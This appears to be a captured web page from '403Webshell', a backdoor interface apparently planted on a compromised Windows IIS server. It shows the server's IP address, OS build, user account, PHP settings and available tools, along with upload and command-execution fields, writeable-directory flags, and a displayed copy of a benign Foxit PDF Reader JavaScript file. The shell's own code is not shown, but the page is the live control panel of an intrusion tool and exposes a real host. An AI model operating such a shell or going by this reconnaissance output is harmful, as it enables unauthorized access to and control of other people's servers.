403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.216.202
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files (x86)/Foxit Software/Foxit PDF Reader/Tracker/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/Program Files (x86)/Foxit Software/Foxit PDF Reader/Tracker/js/external.js
;(function (global) {
    var external = window.external;

    global.externalDispatchFun = function () {
        try {
            return DispatchFun(arguments);
        } catch (e) {
            try {
                return dispatchFun(arguments);
            } catch (e) {
                throw e;
            }
        }
    };

    function dispatchFun (args) {
        switch (args.length) {
            case 2:
                return external.dispatchFun(args[0], args[1]);
            case 3:
                return external.dispatchFun(args[0], args[1], args[2]);
            default :
                throw new Error('argument number error');
        }
    }
    function DispatchFun (args) {
        switch (args.length) {
            case 2:
                return external.DispatchFun(args[0], args[1]);
            case 3:
                return external.DispatchFun(args[0], args[1], args[2]);
            default :
                throw new Error('argument number error');
        }
    }

    var _alert = alert;

    global.notify = function (msg) {
        var div = document.createElement('div');
        div.style = 'z-index: 100000; color: red; font-size: 50px; position: fixed; top: 0; left: 0;';
        var body = document.getElementsByTagName('body')[0];
        body.appendChild(div);
        try {
            div.innerHTML = '1';
            window.external.notify(msg);
            div.innerHTML = '2';
        } catch (e) {
            div.innerHTML = '3';
            _alert(msg);
            div.innerHTML = '4';
        }
    }

})(this);

Youez - 2016 - github.com/yon3zu
LinuXploit